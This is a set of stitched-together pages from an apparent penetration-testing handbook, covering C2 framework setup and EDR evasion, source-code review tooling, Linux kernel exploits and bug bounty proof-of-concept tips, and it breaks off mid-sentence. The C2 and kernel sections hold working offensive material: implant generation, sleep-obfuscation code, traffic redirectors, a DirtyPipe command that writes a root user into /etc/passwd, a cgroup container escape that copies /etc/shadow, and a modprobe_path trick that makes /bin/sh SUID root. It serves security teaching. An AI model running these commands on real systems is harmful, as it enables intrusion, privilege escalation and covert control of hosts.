generation sliver > generate beacon --http https://ts.com --skip-symbols --debug # Process injection sliver (BEACON) > execute-assembly /path/to/tool.exe # In-memory .NET execution sliver (BEACON) > execute-assembly /path/to/Rubeus.exe kerberoast Copy # Clone repository git clone https://github.com/HavocFramework/Havoc.git cd Havoc # Build teamserver cd teamserver go build -o teamserver cmd/server/main.go # Build client cd ../client mkdir build && cd build cmake .. make # Start teamserver ./teamserver server --profile profiles/havoc.yaotl Copy # Via GUI or profile # Havoc uses "Demons" as implants # Profile example (havoc.yaotl) Demon { Sleep: 5 Jitter: 20 Injection { Spawn64: "C:\\Windows\\System32\\notepad.exe" Spawn32: "C:\\Windows\\SysWOW64\\notepad.exe" } } Copy Key Havoc capabilities: - Indirect syscalls - Hardware breakpoint hooks - Sleep obfuscation - Return address spoofing - Module stomping - BOF (Beacon Object Files) support - Token manipulation Copy # In Havoc GUI: # Interact with Demon # Right-click → Interact # Execute commands shell whoami # Load BOF inline-execute /path/to/bof.o args # Process injection inject shellcode # Token operations token list token steal token make Copy # Clone repository git clone https://github.com/its-a-feature/Mythic.git cd Mythic # Install ./mythic-cli install github https://github.com/MythicAgents/Apollo.git ./mythic-cli install github https://github.com/MythicAgents/poseidon.git ./mythic-cli install github https://github.com/MythicC2Profiles/http.git # Start ./mythic-cli start # Access web UI # https://localhost:7443 # Default: mythic_admin / random (check ./mythic-cli config get MYTHIC_ADMIN_PASSWORD) Copy Apollo - Windows C# agent Poseidon - macOS/Linux Go agent Medusa - Python agent Merlin - Go cross-platform Nimplant - Nim-based Copy # Via web interface: # 1. Payloads → Create Payload # 2. Select Agent (Apollo, Poseidon, etc.) # 3. Select C2 Profile (HTTP, websocket, etc.) # 4. Configure callback settings # 5. Build # Apollo example: # - C2 Profile: HTTP # - Callback host: https://teamserver.com # - Callback interval: 10 # - Jitter: 23% Copy # Mythic uses web UI primarily # Key operations available: File Browser - Navigate target filesystem Process List - View/inject processes Shell - Execute commands Upload/Download - File transfer Screenshots - Capture screen Keylog - Keylogging SOCKS - Proxy tunneling Copy Commercial framework known for: - Exceptional EDR evasion - Syscall-based operations - Sleep masking - CFG/CIG bypass - Memory-only execution Copy Badger (agent) capabilities: - Direct/Indirect syscalls - Hardware breakpoint hooking - Stack spoofing - Sleep obfuscation (encrypts memory) - AMSI/ETW bypass - User-defined reflective loader Copy # Typical workflow: 1. Configure listener (HTTP/HTTPS/DNS/SMB) 2. Generate Badger payload 3. Deploy to target 4. Interact via GUI # Advanced features: - Lateral movement templates - Token manipulation - BOF support - LDAP integration - Credential harvesting Copy MDSec's commercial framework: - Position-independent code - Extensive anti-analysis - Sleep obfuscation - Custom memory allocator - Multiple protocols Copy Key capabilities: - Syscall evasion - Module stomping - Sleep encryption - Beacon object files - Token manipulation - Kerberos operations - LDAP queries - WMI/SMB lateral movement Copy 1. Sleep Obfuscation - Encrypt beacon memory during sleep - Avoid memory scanners 2. Indirect Syscalls - Avoid ntdll.dll hooks - Call syscalls directly 3. API Hashing - Resolve APIs at runtime - Avoid import table detection 4. Return Address Spoofing - Fake legitimate call stack - Bypass stack-based detection 5. Hardware Breakpoints - Hook without modifying code - Avoid hook detection 6. Module Stomping - Overwrite legitimate DLL memory - Appear as normal module Copy // Concept: Encrypt beacon in memory during sleep void sleep_obfuscated(DWORD milliseconds) { // 1. Save current memory state void* beacon_memory = get_beacon_memory(); size_t beacon_size = get_beacon_size(); // 2. Encrypt memory encrypt_memory(beacon_memory, beacon_size, key); // 3. Change memory permissions VirtualProtect(beacon_memory, beacon_size, PAGE_NOACCESS, &old); // 4. Sleep SleepEx(milliseconds, FALSE); // 5. Restore permissions VirtualProtect(beacon_memory, beacon_size, PAGE_EXECUTE_READWRITE, &old); // 6. Decrypt memory decrypt_memory(beacon_memory, beacon_size, key); } Copy # Use redirectors to hide C2 server # socat redirector socat TCP4-LISTEN:80,fork TCP4:c2server.internal:80 # iptables redirector iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination C2_IP:80 # Apache mod_rewrite RewriteEngine On RewriteCond %{REQUEST_URI} ^/api/v1/.* RewriteRule ^(.*)$ https://c2server.internal$1 [P] Copy Use CDN to mask C2 traffic: 1. SNI shows: legitimate.cloudfront.net 2. Host header: c2.cloudfront.net 3. CDN routes based on Host header 4. Network sees legitimate CDN traffic Copy Customize C2 traffic to mimic legitimate applications: - User-agent strings - URI patterns - Request/response headers - Body encoding - Jitter and sleep intervals --- # Code review | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/others/code-review.md) . > **Skill Level**: Intermediate to Advanced **Prerequisites**: Programming knowledge, security concepts [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fwww.cobalt.io%2Fhubfs%2FCobalt%252048x48.png&width=20&dpr=3&quality=100&sign=41a17148&sv=2)A Pentester's Guide to Source Code ReviewCobalt](https://www.cobalt.io/blog/a-pentesters-guide-to-source-code-review) [](https://www.pentest-book.com/others/code-review#methodology) Methodology -------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/others/code-review#phase-1-reconnaissance) Phase 1: Reconnaissance ### [](https://www.pentest-book.com/others/code-review#phase-2-high-value-targets) Phase 2: High-Value Targets ### [](https://www.pentest-book.com/others/code-review#phase-3-vulnerability-patterns) Phase 3: Vulnerability Patterns [](https://www.pentest-book.com/others/code-review#sast-tools) SAST Tools ------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/others/code-review#multi-language-scanners) Multi-Language Scanners ### [](https://www.pentest-book.com/others/code-review#secret-detection) Secret Detection [](https://www.pentest-book.com/others/code-review#general) General ------------------------------------------------------------------------ [](https://www.pentest-book.com/others/code-review#javascript) JavaScript ------------------------------------------------------------------------------ [](https://www.pentest-book.com/others/code-review#nodejs) NodeJS ---------------------------------------------------------------------- [](https://www.pentest-book.com/others/code-review#electron) Electron -------------------------------------------------------------------------- [](https://www.pentest-book.com/others/code-review#python) Python ---------------------------------------------------------------------- [](https://www.pentest-book.com/others/code-review#net) .NET ----------------------------------------------------------------- [](https://www.pentest-book.com/others/code-review#php) PHP ---------------------------------------------------------------- [](https://www.pentest-book.com/others/code-review#c-c) C/C++ ------------------------------------------------------------------ [](https://www.pentest-book.com/others/code-review#kotlin) Kotlin ---------------------------------------------------------------------- [](https://www.pentest-book.com/others/code-review#java) Java ------------------------------------------------------------------ Task Command Execute Jar java -jar \[jar\] Unzip Jar unzip -d \[output directory\] \[jar\] Create Jar jar -cmf META-INF/MANIFEST.MF \[output jar\] \* Base64 SHA256 sha256sum \[file\] | cut -d' ' -f1 | xxd -r -p | base64 Remove Signing rm META-INF/_.SF META-INF/_.RSA META-INF/\*.DSA Delete from Jar zip -d \[jar\] \[file to remove\] Decompile class procyon -o . \[path to class\] Decompile Jar procyon -jar \[jar\] -o \[output directory\] Compile class javac \[path to .java file\] [PreviousLLM/AI/ML/prompt testing](https://www.pentest-book.com/others/llm-ai-ml-prompt-testing) [NextPentesting Web checklist](https://www.pentest-book.com/others/web-checklist) Last updated 5 months ago Was this helpful? * [Methodology](https://www.pentest-book.com/others/code-review#methodology) * [Phase 1: Reconnaissance](https://www.pentest-book.com/others/code-review#phase-1-reconnaissance) * [Phase 2: High-Value Targets](https://www.pentest-book.com/others/code-review#phase-2-high-value-targets) * [Phase 3: Vulnerability Patterns](https://www.pentest-book.com/others/code-review#phase-3-vulnerability-patterns) * [SAST Tools](https://www.pentest-book.com/others/code-review#sast-tools) * [Multi-Language Scanners](https://www.pentest-book.com/others/code-review#multi-language-scanners) * [Secret Detection](https://www.pentest-book.com/others/code-review#secret-detection) * [General](https://www.pentest-book.com/others/code-review#general) * [JavaScript](https://www.pentest-book.com/others/code-review#javascript) * [NodeJS](https://www.pentest-book.com/others/code-review#nodejs) * [Electron](https://www.pentest-book.com/others/code-review#electron) * [Python](https://www.pentest-book.com/others/code-review#python) * [.NET](https://www.pentest-book.com/others/code-review#net) * [PHP](https://www.pentest-book.com/others/code-review#php) * [C/C++](https://www.pentest-book.com/others/code-review#c-c) * [Kotlin](https://www.pentest-book.com/others/code-review#kotlin) * [Java](https://www.pentest-book.com/others/code-review#java) Was this helpful? Copy # Understand the application 1. What language/framework is used? 2. What's the application's purpose? 3. How does authentication work? 4. What data does it process? 5. What external services does it connect to? # Get codebase statistics cloc . --exclude-dir=node_modules,vendor,venv tokei . # Find entry points grep -rn "app.get\|app.post\|@RequestMapping\|@GetMapping\|Route\|def index" . Copy # Priority areas to review: 1. Authentication & Authorization 2. Input validation & sanitization 3. Database queries 4. File operations 5. Cryptographic implementations 6. Session management 7. API endpoints 8. Configuration files 9. Third-party integrations 10. Error handling & logging Copy # SQL Injection patterns grep -rn "execute\|query\|cursor\|raw\|sprintf.*SELECT\|%s.*SELECT" . --include="*.py" --include="*.php" --include="*.java" # Command Injection grep -rn "exec\|system\|popen\|subprocess\|shell_exec\|passthru\|eval" . --include="*.py" --include="*.php" --include="*.rb" # Path Traversal grep -rn "open(\|file_get_contents\|readfile\|include\|require\|fopen" . --include="*.py" --include="*.php" # XSS patterns grep -rn "innerHTML\|document.write\|v-html\|dangerouslySetInnerHTML\|\$sce.trustAsHtml" . --include="*.js" --include="*.jsx" --include="*.vue" # Hardcoded secrets grep -rni "password\s*=\|secret\s*=\|api_key\s*=\|token\s*=" . --include="*.py" --include="*.js" --include="*.java" # Deserialization grep -rn "pickle.loads\|yaml.load\|unserialize\|readObject\|JSON.parse" . Copy # Semgrep (recommended - fast, customizable) # https://github.com/returntocorp/semgrep semgrep --config=auto . semgrep --config=p/security-audit . semgrep --config=p/owasp-top-ten . # Custom rules semgrep --config=my-rules.yaml . # Snyk Code # https://snyk.io/product/snyk-code/ snyk code test # SonarQube (comprehensive) # https://www.sonarqube.org/downloads/ docker run -d --name sonarqube -p 9000:9000 sonarqube:community sonar-scanner -Dsonar.projectKey=myproject -Dsonar.sources=. # CodeQL (GitHub's SAST) # https://github.com/github/codeql codeql database create mydb --language=javascript codeql database analyze mydb codeql/javascript-queries:codeql-suites/javascript-security-extended.qls --format=csv --output=results.csv Copy # Gitleaks # https://github.com/gitleaks/gitleaks gitleaks detect -v gitleaks detect --source=. --report-path=leaks.json # TruffleHog # https://github.com/trufflesecurity/trufflehog trufflehog filesystem . --only-verified trufflehog git https://github.com/org/repo --only-verified # detect-secrets # https://github.com/Yelp/detect-secrets detect-secrets scan . --all-files > .secrets.baseline detect-secrets audit .secrets.baseline Copy # Guidelines https://rules.sonarsource.com/ # Resource https://vladtoie.gitbook.io/secure-coding/ # Tools https://www.sonarqube.org/downloads/ https://deepsource.io/signup/ https://github.com/pyupio/safety https://github.com/returntocorp/semgrep https://github.com/WhaleShark-Team/cobra https://github.com/mhaskar/Bughound # Find interesting strings https://github.com/s0md3v/hardcodes https://github.com/micha3lb3n/SourceWolf https://libraries.io/pypi/detect-secrets # Tips 1.Important functions first 2.Follow user input 3.Hardcoded secrets and credentials 4.Use of dangerous functions and outdated dependencies 5.Developer comments, hidden debug functionalities, configuration files, and the .git directory 6.Hidden paths, deprecated endpoints, and endpoints in development 7.Weak cryptography or hashing algorithms 8.Missing security checks on user input and regex strength 9.Missing cookie flags 10.Unexpected behavior, conditionals, unnecessarily complex and verbose functions Copy # Guidelines https://rules.sonarsource.com/ # Resource https://vladtoie.gitbook.io/secure-coding/ # Tools https://www.sonarqube.org/downloads/ https://deepsource.io/signup/ https://github.com/pyupio/safety https://github.com/returntocorp/semgrep https://github.com/WhaleShark-Team/cobra https://github.com/mhaskar/Bughound # Find interesting strings https://github.com/s0md3v/hardcodes https://github.com/micha3lb3n/SourceWolf https://libraries.io/pypi/detect-secrets # Tips 1.Important functions first 2.Follow user input 3.Hardcoded secrets and credentials 4.Use of dangerous functions and outdated dependencies 5.Developer comments, hidden debug functionalities, configuration files, and the .git directory 6.Hidden paths, deprecated endpoints, and endpoints in development 7.Weak cryptography or hashing algorithms 8.Missing security checks on user input and regex strength 9.Missing cookie flags 10.Unexpected behavior, conditionals, unnecessarily complex and verbose functions Copy https://jshint.com/ https://github.com/jshint/jshint/ Copy https://github.com/ajinabraham/nodejsscan Copy https://github.com/doyensec/electronegativity https://github.com/doyensec/awesome-electronjs-hacking Copy # bandit https://github.com/PyCQA/bandit # pyt https://github.com/python-security/pyt # atheris https://github.com/google/atheris # aura https://github.com/SourceCode-AI/aura Copy # dnSpy https://github.com/0xd4d/dnSpy # .NET compilation C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe test.cs # Cheatsheet https://www.c-sharpcorner.com/UploadFile/ajyadav123/net-penetration-testing-cheat-sheet/ Copy # phpvuln https://github.com/ecriminal/phpvuln Copy # flawfinder https://github.com/david-a-wheeler/flawfinder Copy https://github.com/detekt/detekt Copy # JD-Gui https://github.com/java-decompiler/jd-gui # Java compilation step-by-step javac -source 1.8 -target 1.8 test.java mkdir META-INF echo "Main-Class: test" > META-INF/MANIFEST.MF jar cmvf META-INF/MANIFEST.MF test.jar test.class --- # Linux Kernel Exploits | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/exploitation/linux-kernel-2024.md) . Modern Linux kernel vulnerabilities and exploitation techniques. > **Skill Level**: Advanced **Prerequisites**: C programming, Linux internals, memory corruption basics [](https://www.pentest-book.com/exploitation/linux-kernel-2024#kernel-exploit-landscape) Kernel Exploit Landscape ---------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#quick-version-check) Quick Version Check Copy # Get kernel version uname -r cat /proc/version # Check for known vulnerabilities # https://github.com/lucyoa/kernel-exploits # https://github.com/briskets/linux-exploit-suggester [](https://www.pentest-book.com/exploitation/linux-kernel-2024#recent-critical-cves) Recent Critical CVEs -------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2024-1086-nf_tables-use-after-free) CVE-2024-1086 (nf\_tables Use-After-Free) Copy # Affects: Linux kernel < 6.8 # Type: Use-after-free in netfilter nf_tables # Impact: Local privilege escalation # Check if vulnerable cat /proc/version # < 6.8 lsmod | grep nf_tables # Exploit: https://github.com/Notselwyn/CVE-2024-1086 git clone https://github.com/Notselwyn/CVE-2024-1086 cd CVE-2024-1086 make ./exploit # Expected: Root shell ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2023-32233-nf_tables-batch-request-uaf) CVE-2023-32233 (nf\_tables Batch Request UAF) ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2023-2640-and-cve-2023-32629-gameover-lay) CVE-2023-2640 & CVE-2023-32629 (GameOver(lay)) ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2023-0386-overlayfs-privilege-escalation) CVE-2023-0386 (OverlayFS Privilege Escalation) ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2022-0847-dirtypipe) CVE-2022-0847 (DirtyPipe) ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2022-2588-route4-uaf) CVE-2022-2588 (route4 UAF) [](https://www.pentest-book.com/exploitation/linux-kernel-2024#io_uring-vulnerabilities) io\_uring Vulnerabilities ----------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#overview) Overview ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2024-0582-io_uring-pbuf-uaf) CVE-2024-0582 (io\_uring PBUF UAF) ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2023-2598-io_uring-uaf) CVE-2023-2598 (io\_uring UAF) ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#disable-io_uring-mitigation) Disable io\_uring (Mitigation) [](https://www.pentest-book.com/exploitation/linux-kernel-2024#ebpf-exploits) eBPF Exploits ------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#attack-surface) Attack Surface ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2023-2163-ebpf-verifier-bypass) CVE-2023-2163 (eBPF Verifier Bypass) ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#mitigation) Mitigation [](https://www.pentest-book.com/exploitation/linux-kernel-2024#container-escape-exploits) Container Escape Exploits ------------------------------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2024-21626-runc-container-escape) CVE-2024-21626 (runc Container Escape) ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2022-0492-cgroup-escape) CVE-2022-0492 (cgroup Escape) [](https://www.pentest-book.com/exploitation/linux-kernel-2024#exploitation-techniques) Exploitation Techniques -------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#heap-exploitation) Heap Exploitation ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#rop-in-kernel) ROP in Kernel ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#ret2usr-if-no-smep-smap) ret2usr (If No SMEP/SMAP) ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#modprobe-path-overwrite) Modprobe Path Overwrite [](https://www.pentest-book.com/exploitation/linux-kernel-2024#kernel-protection-bypass) Kernel Protection Bypass ---------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#kaslr-bypass) KASLR Bypass ### [](https://www.pentest-book.com/exploitation/linux-kernel-2024#smep-smap-bypass) SMEP/SMAP Bypass [](https://www.pentest-book.com/exploitation/linux-kernel-2024#tools) Tools -------------------------------------------------------------------------------- [](https://www.pentest-book.com/exploitation/linux-kernel-2024#quick-reference) Quick Reference ---------------------------------------------------------------------------------------------------- CVE Kernel Versions Type CVE-2024-1086 < 6.8 nf\_tables UAF CVE-2023-32233 5.1-6.3.1 nf\_tables UAF CVE-2023-2640 Ubuntu specific OverlayFS CVE-2023-0386 < 6.2 OverlayFS CVE-2022-0847 5.8-5.16.11 DirtyPipe CVE-2022-2588 < 5.19 route4 UAF [](https://www.pentest-book.com/exploitation/linux-kernel-2024#related-topics) Related Topics -------------------------------------------------------------------------------------------------- * [Linux Post-Exploitation](https://github.com/six2dez/pentest-book/blob/master/linux.md) - Linux privesc * [Privilege Escalation](https://www.pentest-book.com/exploitation/privilege-escalation) - Overview * [Docker & Kubernetes](https://www.pentest-book.com/enumeration/cloud/docker-and-and-kubernetes) - Container escapes [PreviousWeb Exploits & C2](https://www.pentest-book.com/exploitation/web-exploits) [NextModern C2 Frameworks](https://www.pentest-book.com/exploitation/modern-c2) Last updated 5 months ago Was this helpful? * [Kernel Exploit Landscape](https://www.pentest-book.com/exploitation/linux-kernel-2024#kernel-exploit-landscape) * [Quick Version Check](https://www.pentest-book.com/exploitation/linux-kernel-2024#quick-version-check) * [Recent Critical CVEs](https://www.pentest-book.com/exploitation/linux-kernel-2024#recent-critical-cves) * [CVE-2024-1086 (nf\_tables Use-After-Free)](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2024-1086-nf_tables-use-after-free) * [CVE-2023-32233 (nf\_tables Batch Request UAF)](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2023-32233-nf_tables-batch-request-uaf) * [CVE-2023-2640 & CVE-2023-32629 (GameOver(lay))](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2023-2640-and-cve-2023-32629-gameover-lay) * [CVE-2023-0386 (OverlayFS Privilege Escalation)](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2023-0386-overlayfs-privilege-escalation) * [CVE-2022-0847 (DirtyPipe)](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2022-0847-dirtypipe) * [CVE-2022-2588 (route4 UAF)](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2022-2588-route4-uaf) * [io\_uring Vulnerabilities](https://www.pentest-book.com/exploitation/linux-kernel-2024#io_uring-vulnerabilities) * [Overview](https://www.pentest-book.com/exploitation/linux-kernel-2024#overview) * [CVE-2024-0582 (io\_uring PBUF UAF)](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2024-0582-io_uring-pbuf-uaf) * [CVE-2023-2598 (io\_uring UAF)](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2023-2598-io_uring-uaf) * [Disable io\_uring (Mitigation)](https://www.pentest-book.com/exploitation/linux-kernel-2024#disable-io_uring-mitigation) * [eBPF Exploits](https://www.pentest-book.com/exploitation/linux-kernel-2024#ebpf-exploits) * [Attack Surface](https://www.pentest-book.com/exploitation/linux-kernel-2024#attack-surface) * [CVE-2023-2163 (eBPF Verifier Bypass)](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2023-2163-ebpf-verifier-bypass) * [Mitigation](https://www.pentest-book.com/exploitation/linux-kernel-2024#mitigation) * [Container Escape Exploits](https://www.pentest-book.com/exploitation/linux-kernel-2024#container-escape-exploits) * [CVE-2024-21626 (runc Container Escape)](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2024-21626-runc-container-escape) * [CVE-2022-0492 (cgroup Escape)](https://www.pentest-book.com/exploitation/linux-kernel-2024#cve-2022-0492-cgroup-escape) * [Exploitation Techniques](https://www.pentest-book.com/exploitation/linux-kernel-2024#exploitation-techniques) * [Heap Exploitation](https://www.pentest-book.com/exploitation/linux-kernel-2024#heap-exploitation) * [ROP in Kernel](https://www.pentest-book.com/exploitation/linux-kernel-2024#rop-in-kernel) * [ret2usr (If No SMEP/SMAP)](https://www.pentest-book.com/exploitation/linux-kernel-2024#ret2usr-if-no-smep-smap) * [Modprobe Path Overwrite](https://www.pentest-book.com/exploitation/linux-kernel-2024#modprobe-path-overwrite) * [Kernel Protection Bypass](https://www.pentest-book.com/exploitation/linux-kernel-2024#kernel-protection-bypass) * [KASLR Bypass](https://www.pentest-book.com/exploitation/linux-kernel-2024#kaslr-bypass) * [SMEP/SMAP Bypass](https://www.pentest-book.com/exploitation/linux-kernel-2024#smep-smap-bypass) * [Tools](https://www.pentest-book.com/exploitation/linux-kernel-2024#tools) * [Quick Reference](https://www.pentest-book.com/exploitation/linux-kernel-2024#quick-reference) * [Related Topics](https://www.pentest-book.com/exploitation/linux-kernel-2024#related-topics) Was this helpful? Copy # Affects: Linux kernel 5.1 to 6.3.1 # Type: Use-after-free in nf_tables # Impact: Local privilege escalation # Check version uname -r # Requires: CAP_NET_ADMIN in user namespace # Or unprivileged user namespaces enabled cat /proc/sys/kernel/unprivileged_userns_clone # Exploit: https://github.com/Liuk3r/CVE-2023-32233 Copy # Affects: Ubuntu kernels with OverlayFS # Type: Privilege escalation via OverlayFS # Impact: Local root # Check if vulnerable (Ubuntu specific) cat /etc/os-release uname -r # Simple check unshare -rm sh -c "mkdir l u w m && cp /u*/teleif l/teleif && setcap cap_setuid+eip l/teleif && mount -t overlay overlay -o lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/teleif # Exploit: https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629 Copy # Affects: Linux kernel < 6.2 # Type: OverlayFS capability bypass # Impact: Local privilege escalation # Check uname -r # < 6.2 # Requires overlayfs and user namespaces cat /proc/filesystems | grep overlay # Exploit: https://github.com/sxlmnwb/CVE-2023-0386 Copy # Affects: Linux kernel 5.8 to 5.16.11, 5.15.25, 5.10.102 # Type: Pipe buffer flag overwrite # Impact: Arbitrary file write, privilege escalation # Check version uname -r # Compile exploit # https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit gcc -o exploit exploit.c ./exploit /etc/passwd 1 $'toor:$1$salt$hash:0:0:root:/root:/bin/bash\n' # Then: su toor Copy # Affects: Linux kernel < 5.19 # Type: Use-after-free in route4 classifier # Impact: Local privilege escalation # Requires: CONFIG_NET_CLS_ROUTE4=y cat /boot/config-$(uname -r) | grep CONFIG_NET_CLS_ROUTE4 # Exploit: https://github.com/Markakd/CVE-2022-2588 Copy io_uring is async I/O interface (kernel 5.1+) Complex attack surface - many vulnerabilities discovered Often requires: kernel 5.1+, io_uring enabled Copy # Affects: Linux 6.4 to 6.7 # Type: Use-after-free in provided buffers # Check io_uring availability cat /proc/filesystems | grep io_uring ls /dev/io_uring* 2>/dev/null Copy # Affects: Linux kernel 5.7 to 6.3 # Type: Use-after-free # Exploit approach varies by kernel version # Check specific PoCs for your kernel Copy # Check if disabled sysctl kernel.io_uring_disabled # Disable (requires root) sysctl -w kernel.io_uring_disabled=2 # Or in /etc/sysctl.conf kernel.io_uring_disabled = 2 Copy eBPF (extended Berkeley Packet Filter): - Runs in kernel context - Verifier supposed to ensure safety - Verifier bugs = kernel code execution Copy # Affects: Various kernel versions # Type: Verifier bounds tracking error # Impact: Arbitrary kernel read/write # Check eBPF availability ls /sys/fs/bpf/ bpftool prog list 2>/dev/null # Unprivileged BPF (if enabled) cat /proc/sys/kernel/unprivileged_bpf_disabled # 0 = unprivileged users can use BPF Copy # Disable unprivileged BPF sysctl -w kernel.unprivileged_bpf_disabled=1 # Lockdown BPF echo 2 > /proc/sys/kernel/unprivileged_bpf_disabled Copy # Affects: runc < 1.1.12 # Type: File descriptor leak # Impact: Container escape # Check runc version runc --version docker info | grep -i runc # Exploit involves: # 1. Leaking /proc/self/fd/X from runc # 2. Using leaked fd to access host filesystem Copy # Affects: Linux kernel < 5.17 # Type: cgroup v1 release_agent escape # Impact: Container escape (if cgroup mounted) # Inside container mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab) echo "$host_path/exploit.sh" > /tmp/cgrp/release_agent echo '#!/bin/sh' > /exploit.sh echo "cat /etc/shadow > $host_path/shadow" >> /exploit.sh chmod +x /exploit.sh sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" Copy // Modern kernel heap (SLUB) exploitation // 1. Spray technique // Allocate many objects to control heap layout for (int i = 0; i < 1000; i++) { spray_objects[i] = allocate_kernel_object(); } // 2. Cross-cache attack // Exhaust slab, force allocation from different cache // Allows type confusion between objects // 3. msg_msg spray // Use msgsnd() to spray controlled data struct msgbuf { long mtype; char mtext[SIZE]; }; msgsnd(qid, &msg, SIZE, 0); Copy // Kernel ROP gadgets // Find with: ROPgadget --binary vmlinux // Typical chain: // 1. Disable SMEP/SMAP (if possible) // 2. Call commit_creds(prepare_kernel_cred(0)) // 3. Return to userspace // prepare_kernel_cred and commit_creds addresses // /proc/kallsyms (if kptr_restrict=0) cat /proc/kallsyms | grep -E "prepare_kernel_cred|commit_creds" Copy // Direct jump to userspace code from kernel // Blocked by SMEP (code) and SMAP (data) // Check protections cat /proc/cpuinfo | grep -E "smep|smap" // If neither present: void escalate() { commit_creds(prepare_kernel_cred(0)); } // Overwrite function pointer to point to escalate() Copy // Overwrite modprobe_path to execute arbitrary binary // When unknown binary format executed, kernel runs modprobe // 1. Find modprobe_path address cat /proc/kallsyms | grep modprobe_path // 2. Overwrite with path to your script // modprobe_path = "/tmp/pwn" // 3. Create /tmp/pwn script echo '#!/bin/sh' > /tmp/pwn echo 'chmod 4755 /bin/sh' >> /tmp/pwn chmod +x /tmp/pwn // 4. Trigger by executing invalid binary echo -e '\xff\xff\xff\xff' > /tmp/invalid chmod +x /tmp/invalid /tmp/invalid // 5. Now /bin/sh is SUID root /bin/sh -p Copy # Kernel Address Space Layout Randomization # Leaks needed to find kernel addresses # Common leak sources: # - /proc/kallsyms (if kptr_restrict=0) # - dmesg (if dmesg_restrict=0) # - Kernel info leaks via side channels # - eBPF verifier leaks # Check restrictions cat /proc/sys/kernel/kptr_restrict cat /proc/sys/kernel/dmesg_restrict Copy // SMEP: Can't execute userspace code from kernel // SMAP: Can't access userspace data from kernel // Bypass via ROP: // 1. Flip CR4 bits to disable SMEP/SMAP // native_write_cr4 gadget // Or use kernel-only ROP chain // Stay entirely in kernel space Copy # Linux Exploit Suggester https://github.com/mzet-/linux-exploit-suggester ./linux-exploit-suggester.sh # Linux Exploit Suggester 2 https://github.com/jondonas/linux-exploit-suggester-2 perl linux-exploit-suggester-2.pl # PEDA/GEF/pwndbg for kernel debugging # https://github.com/pwndbg/pwndbg # Kernel exploit development https://github.com/xairy/kernel-exploits --- # BugBounty | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/others/bugbounty.md) . [](https://www.pentest-book.com/others/bugbounty#https-github.com-bugcrowd-templates) [https://github.com/bugcrowd/templates](https://github.com/bugcrowd/templates) -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/bugbounty#good-poc) Good PoC ------------------------------------------------------------------------ Issue type PoC Cross-site scripting `alert(document.domain)` or `` setInterval`alert\x28document.domain\x29` `` if you have to use backticks. [\[1\]](https://medium.com/@know.0nix/jumping-to-the-hell-with-10-attempts-to-bypass-devils-waf-4275bfe679dd) Using `document.domain` instead of `alert(1)` can help avoid reporting XSS bugs in sandbox domains. Command execution Depends of program rules: * Read (Linux-based): `cat /proc/1/maps` * Write (Linux-based): `touch /root/your_username` * Execute (Linux-based): `id` Code execution This involves the manipulation of a web app such that server-side code (e.g. PHP) is executed. * PHP: `` SQL injection Zero impact * MySQL and MSSQL: `SELECT @@version` * Oracle: `SELECT version FROM v$instance;` * Postgres SQL: `SELECT version()` Unvalidated redirect * Set the redirect endpoint to a known safe domain (e.g. `google.com`), or if looking to demonstrate potential impact, to your own website with an example login screen resembling the target's. * If the target uses OAuth, you can try to leak the OAuth token to your server to maximise impact. Information exposure Investigate only with the IDs of your own test accounts — do not leverage the issue against other users' data — and describe your full reproduction process in the report. Cross-site request forgery When designing a real-world example, either hide the form (`style="display:none;"`) and make it 